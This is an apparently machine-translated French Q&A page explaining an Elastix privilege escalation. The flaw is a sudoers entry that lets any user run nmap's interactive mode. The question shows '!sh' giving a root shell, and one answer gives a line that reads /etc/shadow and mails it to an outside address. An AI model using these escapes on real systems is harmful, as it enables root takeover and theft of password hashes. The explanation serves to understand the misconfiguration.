web-dev-qa-db-fra.com

Comment cette vulnérabilité d'escalade sur les privilèges sur Elastix travaille-t-elle?

Voici une vulnérabilité d'escalade de privilège sur Elastix:

# id
# uid=100(name) gid=101(name)
# Sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Comment un utilisateur normal pourrait-il commencer NMAP avec le privilège sudo? Qu'est-ce qui est mal configuré ici?

Source: http://seclists.org/fulldisclost/2012/mar/234

3
ramailo sathi

La configuration erronée proviendrait d'un groupe ou d'une entrée utilisateur dans sudoers.conf. C'est le fichier qui contrôle qui peut faire quoi (en ce qui concerne Sudo). Dans ce cas, en juger par vos commandes (s'ils n'étaient pas modifiés), le fichier sudoers contient une entrée pour l'astérisque de l'utilisateur pour exécuter la commande sudo sans entrer un mot de passe.

Maintenant dans le cas de nmap --interactive - Cela a été supprimé il y a quelque temps. Il y avait une astuce d'évasion que quelqu'un pourrait utiliser en nmap pour abuser du système. Par exemple.:

nmap> !head -n1 /etc/shadow | mail -s shadow [email protected]
3
munkeyoto